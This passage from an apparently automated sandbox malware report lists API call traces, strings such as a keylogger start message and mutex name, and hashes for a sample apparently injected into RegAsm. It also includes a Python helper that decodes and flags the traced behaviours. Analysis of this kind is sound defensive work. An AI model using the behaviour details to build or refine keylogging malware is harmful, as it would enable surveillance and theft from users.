                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                                                  • __freea.LIBCMT ref: 0044AEB0
                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  • __freea.LIBCMT ref: 0044AEB9
                                                                                                                                  • __freea.LIBCMT ref: 0044AEDE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3864826663-0
                                                                                                                                  • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                                                  • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                  • String ID: xpF
                                                                                                                                  • API String ID: 1852769593-354647465
                                                                                                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                  • String ID: XQG
                                                                                                                                  • API String ID: 1958988193-3606453820
                                                                                                                                  • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                                                                  • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountEventTick
                                                                                                                                  • String ID: !D@$NG
                                                                                                                                  • API String ID: 180926312-2721294649
                                                                                                                                  • Opcode ID: c3f80c094ccbf3a0d969685c917aabb4aee4931f33e0778c189d4cd75541e698
                                                                                                                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                                                                  • Opcode Fuzzy Hash: c3f80c094ccbf3a0d969685c917aabb4aee4931f33e0778c189d4cd75541e698
                                                                                                                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                  • String ID: Offline Keylogger Started
                                                                                                                                  • API String ID: 465354869-4114347211
                                                                                                                                  • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                                                  • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                                                  Strings
                                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create$EventLocalThreadTime
                                                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                  • API String ID: 2532271599-1507639952
                                                                                                                                  • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                                                                                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                                                                  • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                                                                                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                  • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                  • String ID: pth_unenc
                                                                                                                                  • API String ID: 1818849710-4028850238
                                                                                                                                  • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                                                  • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
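The API trace lines in the entries above (one "• Name.MODULE(args), ref: ADDR" line per call site, with a "Part of subcall function" prefix for callees and, for a few calls such as wsprintfW.USER32, no argument list at all) can be parsed and their hex arguments decoded mechanically, which makes the file-append, HKCU registry write and 10-second Sleep in the entries readable without a constant table to hand. The following Python is an added example written for this page, not Joe Sandbox code: the line format is inferred from the entries shown, the two sample entries are copied from the report above, the constant tables cover only the Win32 values those entries use, and the behaviour flags are illustrative triage heuristics, not Joe Sandbox's signature logic.

```python
"""Parse Joe Sandbox per-function API trace lines and decode the Win32 constants.
Added example for this page, not Joe Sandbox code: the line format is inferred from
the entries above and the constant tables cover only the values those entries use."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Sample input, copied verbatim from two function entries in this report.
APPEND_ENTRY = """
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
• CloseHandle.KERNEL32(00000000), ref: 0041C4EA
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
• CloseHandle.KERNEL32(00000000), ref: 0041C508
"""
REG_ENTRY = """
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
• RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
• RegCloseKey.KERNEL32(?), ref: 004137EC
"""

# "• Name.MODULE(args), ref: ADDR"; callee lines carry a "Part of subcall function" prefix
# and some lines (e.g. wsprintfW.USER32) have no argument list at all.
LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")

@dataclass
class Call:
    name: str
    module: str
    args: list                    # int (32-bit value), str (e.g. Function_0000A2A2) or None ("?")
    ref: int                      # call-site address
    caller: Optional[int] = None  # set for "Part of subcall function" lines

def parse_arg(tok: str):
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_trace(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            raw, caller = m.group("args"), m.group("caller")
            calls.append(Call(m.group("name"), m.group("module"),
                              [parse_arg(t) for t in raw.split(",")] if raw else [],
                              int(m.group("ref"), 16), int(caller, 16) if caller else None))
    return calls

HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}

# (API name, zero-based argument index) -> decoder for that argument
DECODERS = {
    ("CreateFileW", 1): lambda v: "|".join(n for b, n in ACCESS.items() if v & b) or f"{v:08X}",
    ("CreateFileW", 4): lambda v: DISPOSITION.get(v, f"{v:08X}"),
    ("SetFilePointer", 3): lambda v: MOVE_METHOD.get(v, f"{v:08X}"),
    ("RegCreateKeyA", 0): lambda v: HKEY.get(v, f"{v:08X}"),
    ("Sleep", 0): lambda v: f"{v} ms",
}

def decode(call: Call) -> List[str]:
    # Render each argument, substituting a symbolic name where a decoder exists.
    out = []
    for i, a in enumerate(call.args):
        dec = DECODERS.get((call.name, i))
        if a is None:
            out.append("?")
        elif isinstance(a, int):
            out.append(dec(a) if dec else f"{a:08X}")
        else:
            out.append(a)
    return out

def flag_behaviours(calls: List[Call]) -> List[str]:
    # Illustrative heuristics over one entry's call sequence, not Joe Sandbox's signatures.
    names = [c.name for c in calls]
    found = []
    # a value written under HKEY_CURRENT_USER (the pth_unenc entry above)
    if any(c.name == "RegCreateKeyA" and c.args[:1] == [0x80000001] for c in calls) \
            and any(n.startswith("RegSetValueEx") for n in names):
        found.append("hkcu_value_write")
    # GENERIC_WRITE handle, seek to FILE_END, then WriteFile: appending to a log file
    if any(c.name == "CreateFileW" and len(c.args) > 1 and isinstance(c.args[1], int)
           and c.args[1] & 0x40000000 for c in calls) \
            and any(c.name == "SetFilePointer" and c.args[3:4] == [2] for c in calls) \
            and "WriteFile" in names:
        found.append("file_append")
    # a delay of 5 s or more inside the function body
    if any(c.name == "Sleep" and c.args and isinstance(c.args[0], int) and c.args[0] >= 5000
           for c in calls):
        found.append("long_sleep")
    return found
```

Run `parse_trace` over an entry's API lines and `decode` each `Call` to get, for the first sample, `CreateFileW(00000000, GENERIC_WRITE, 00000000, 00000000, CREATE_ALWAYS, 00000080, 00000000)` followed by `SetFilePointer(..., FILE_END)` and `WriteFile`, which `flag_behaviours` reports as `file_append`; the registry entry decodes its root key to `HKEY_CURRENT_USER` and is reported as `hkcu_value_write`. Arguments the sandbox could not resolve stay as `?`, and symbolic callback names such as `Function_0000A2A2` are kept as strings rather than forced to integers.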
                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3360349984-0
APIs
• GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: HandleModuleProtectVirtual
• String ID:
• API String ID: 2905821283-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
• GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
• GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
• CloseHandle.KERNEL32(00000000), ref: 0041C576
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
APIs
  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
• GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID: fYM/
• API String ID: 546120528-2459865102
APIs
• GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: Info
• String ID: $fYM/
• API String ID: 1807457897-372684241
APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
• SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/jpeg
• API String ID: 1291196975-3785015651
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: String
• String ID: LCMapStringEx$fYM/
• API String ID: 2568140703-416117473
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: Alloc
• String ID: FlsAlloc$fYM/
• API String ID: 2773662609-550503114
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
• GetLastError.KERNEL32 ref: 0040D0BE
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: Rmc-IAW1Y3
• API String ID: 1925916568-3914838558
APIs
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: HandleModuleProtectVirtual
• String ID:
• API String ID: 2905821283-0
APIs
• send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
• SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: EventObjectSingleWaitsend
• String ID:
• API String ID: 3963590051-0
APIs
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ProtectVirtual$HandleModule
• String ID:
• API String ID: 3519776433-0
APIs
